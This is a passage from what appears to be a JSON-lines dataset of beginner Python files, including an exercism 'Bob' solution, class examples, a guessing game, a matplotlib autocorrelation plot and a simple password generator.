start_time))\n","repo_name":"JVorous/ProjectEuler","sub_path":"problem36.py","file_name":"problem36.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40699884629","text":"#\r\n# Skeleton file for the Python \"Bob\" exercise.\r\n#\r\ndef hey(what):\r\n alphas=caps=0\r\n if what.strip()=='':\r\n return 'Fine. Be that way!'\r\n for i in range(len(what)):\r\n if what[i].isalpha(): alphas+=1\r\n if what[i].isupper(): caps+=1\r\n if alphas==caps and alphas!=0: return 'Whoa, chill out!'\r\n if what.strip()[-1]=='?':\r\n return 'Sure.'\r\n else: return 'Whatever.'\r\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/bob/9239173283e942f0abf5adc46080ceb8.py","file_name":"9239173283e942f0abf5adc46080ceb8.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"35524709303","text":"class Plant:\n def __init__(self, name):\n self._name = name\n\n def get_name(self):\n return self._name\n\n def set_name(self, new_name):\n self._name = new_name\n return\n\n\nobj = Plant(\"object\")\nprint(obj.get_name())\n\n\nclass Wood(Plant):\n def __init__(self, name, color):\n super().__init__(name)\n self.color = color\n\n\noak = Wood(\"oak\", \"brown\")\nprint(oak.get_name())\nprint(oak.color)\n\n\nclass Furniture:\n def __init__(self, furniture_name, name, color):\n self.furniture_name = furniture_name\n self.wood = Wood(name, color)\n\n\nfurniture = Furniture(\"bench\", \"pine\", \"light brown\")\nprint(furniture.furniture_name)\nprint(furniture.wood.get_name())\nprint(furniture.wood.color)\n\n\nclass ClassB:\n class_variable = 2\n\n def __init__(self, object_variable):\n self.object_variable = object_variable\n\n @classmethod\n def class_method(cls):\n cls.class_variable = 3\n return\n\n def object_method(self):\n self.object_variable = \"longer_string\"\n return\n\n\nobj1 = ClassB(\"string\")\nobj2 = ClassB(\"also a string\")\n\nprint(obj1.object_variable)\nprint(obj2.object_variable)\nobj1.object_method()\nprint(obj1.object_variable)\nprint(obj2.object_variable)\n\nprint(obj1.class_variable)\nprint(obj2.class_variable)\nClassB.class_method()\nprint(obj1.class_variable)\nprint(obj2.class_variable)\n","repo_name":"ivanyang06/CsTest","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"41004763846","text":"import random\n\nnum = random.randint(0,100)\nwhile True:\n try:\n guess = int(input('enter 1-100\\n'))\n except ValueError as e:\n print(\"error\",e)\n continue\n if guess > num:\n print('猜大了')\n elif guess < num:\n print('猜小了')\n else:\n print('ok')\n break","repo_name":"mixinan/first-python-project","sub_path":"guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72265094936","text":"# Implementation of matplotlib.pyplot.acorr()\n# function\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Fixing random state for reproducibility\nnp.random.seed(10**7)\n\ngeeks = np.random.randn(51)\nfig = plt.figure(figsize = (10,10))\n\nplt.title(\"Autocorrelation Example\")\nplt.acorr(geeks, usevlines = True, normed = True, maxlags = 50, lw = 2)\n\nplt.grid(True)\nfig.savefig('acorr_function_exp2.pdf',bbox_inches='tight')\n","repo_name":"Python-Learning-SJ/matplotlib","sub_path":"acorr_function_exp2.py","file_name":"acorr_function_exp2.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17271509929","text":"\"\"\"\n Генератор паролей.\n Пользователь выбирает 1 из 3 вариантов:\n 1. Сгенерировать простой пароль (только буквы в нижнем регистре, 8 символов)\n 2. Сгенерировать средний пароль (любые буквы и цифры, 8 символов)\n 3. Сгенерировать сложный пароль (минимум 1 большая буква, 1 маленькая, 1 цифра и 1 спец-символ, длина от 8 до 16 символов)\n (для 3 пункта можно генерировать пароли до тех пор, пока не выполнится условие)\n\n Для решения использовать:\n - константы строк из модуля string (ascii_letters, digits и т.д.)\n - функцию choice из модуля random (для выборки случайного элемента из последовательности)\n - функцию randint из модуля random (для генерации случайной длины сложного пароля от 8 до 16 символов)\n\n\n Дополнительно (не влияет на оценку):\n 1. Позволить пользователю выбирать длину пароля, но предупреждать, что\n пароль ненадежный, если длина меньше 8 символов\n 2. Добавить еще вариант генерации пароля - 4. Пользовательский пароль:\n - пользователь вводил пул символов, из которых будет генерироваться пароль\n - вводит длину желаемого пароля\n - программа генерирует пароль из нужной длины из введенных символов\n - * игнорируются пробелы\n\"\"\"\n# ОСНОВНОЕ ЗАДАНИЕ\nfrom random import choice, randint\nimport string\n\n\ndef main():\n try:\n choice_pasword = int(input('Сгенерировать простой пароль - 1'\n 'Сгенерировать средний пароль - 2'\n 'Сгенерировать сложний пароль - 3:'))\n except ValueError:\n print('Введите число от 1 до 3')\n return main()\n length = 8 # для 1 и 2 задния\n length_2 = randint(8, 16) # для 3\n\n small = string.ascii_lowercase\n big = string.ascii_uppercase\n spec = string.punctuation\n digits = string.digits\n all_symbols = spec+digits+big+small\n average = small+big+digits\n pas = ''\n if choice_pasword > 4:\n print('Введите число от 1 до 3')\n return main()\n if choice_pasword == 1:\n pas = pas + choice(small)\n while len(pas) < length:\n pas += choice(small)\n if choice_pasword == 2:\n pas = pas + choice(average)\n while len(pas) < length:\n pas += choice(average)\n if choice_pasword == 3:\n pas += choice(digits)\n pas += choice(small)\n pas += choice(big)\n pas += choice(spec)\n while len(pas) < length_2:\n pas += choice(all_symbols)\n print(pas)\n\n\nmain()\n\n# ДОПОЛНИТЕЛЬНОЕ\n\n\ndef main1():\n words_for_password = input('Введите символы для будущего пароля: ')\n words = words_for_password.replace(' ', '')\n length_3 = int(input('Введите кол символов для пароля - \"Больше 8\" :'))\n pas = ''\n if len(words) < 8 or length_3 < 8:\n print('Пароль не надежный.\\nВведите больше 8 символов')\n return main1()\n else:\n pas = pas + choice(words)\n while len(pas) < length_3:\n pas += choice(words)\n print(pas)\n\n\nmain1()\n","repo_name":"Sersh4745/python_learn","sub_path":"Diachenko.hw5/password_gen.py","file_name":"password_gen.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}